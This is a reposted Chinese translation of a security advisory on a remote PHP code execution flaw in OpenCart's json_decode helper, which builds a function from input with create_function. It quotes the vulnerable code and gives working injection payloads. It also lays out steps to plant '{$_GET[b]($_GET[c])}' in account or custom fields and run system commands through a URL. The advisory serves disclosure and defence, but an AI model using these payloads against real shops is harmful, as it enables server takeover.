转载

OpenCart json_decode函数中存在远程PHP代码执行漏洞

2016-04-12 14:12:56 来源:360安全播报 作者:暗羽喵 阅读:103次

分享到:

OpenCart json_decode函数中存在远程PHP代码执行漏洞

最近,安全研究人员Naser Farhadi(Twitter: @naserfarhadi)发现OpenCart json_decode函数中存在远程PHP代码执行漏洞,涉及到的版本有2.1.0.2 到 2.2.0.0 (最新版本)

漏洞存在于 /upload/system/helper/json.php中,其中有这段代码

# /upload/system/helper/json.php $match = '/".*?(?<!////)"/'; $string = preg_replace($match, '', $json); $string = preg_replace('/[,:{}/[/]0-9./-+Eaeflnr-u /n/r/t]/', '', $string); ... $function = @create_function('', "return {$json};"); /**** 万恶之源 ****/ $return = ($function) ? $function() : null; ... return $return;

其中通过json进行了函数的创建,而json_decode函数可被利用

这里是几个简单的测试例子

var_dump(json_decode('{"ok":"1"."2"."3"}'));

OpenCart json_decode函数中存在远程PHP代码执行漏洞

var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));

OpenCart json_decode函数中存在远程PHP代码执行漏洞

var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));

OpenCart json_decode函数中存在远程PHP代码执行漏洞

OpenCart json_decode函数中存在远程PHP代码执行漏洞

OpenCart json_decode函数中存在远程PHP代码执行漏洞

在真实场景中,可以通过/index.php?route=account/edit进行利用

例如将$_SERVER[HTTP_USER_AGENT]作为姓名填写进去,保存(需要重复两次)

OpenCart json_decode函数中存在远程PHP代码执行漏洞

之后当管理员访问管理面板时,他会在最近活动中本应显示你的姓名的地方看到他自己的UserAgent

OpenCart json_decode函数中存在远程PHP代码执行漏洞

另一个例子是在account/edit 或者 account/register 中的 custom_field ,在这里进行利用可能是最合适的

如果管理员在/admin/index.php?route=customer/custom_field中添加了一个自定义的区域用于电话号码之类的额外信息

OpenCart json_decode函数中存在远程PHP代码执行漏洞

你就可以直接注入你的代码在这个custom_field中

例如将{$_GET[b]($_GET[c])}填写到这个custom_field中,保存

OpenCart json_decode函数中存在远程PHP代码执行漏洞

然后访问

http://host/shop_directory/index.php?route=account/edit&b=system&c=ls

你会看到代码被正确执行了

OpenCart json_decode函数中存在远程PHP代码执行漏洞

OpenCart json_decode函数中存在远程PHP代码执行漏洞

需要注意的是,这种利用方式只会在 PHP JSON扩展没有安装的情况下有效

本文由 360安全播报 翻译,转载请注明“转自360安全播报”,并附上链接。

原文链接:http://seclists.org/bugtraq/2016/Apr/61
原文  http://bobao.360.cn/learning/detail/2836.html
正文到此结束
Loading...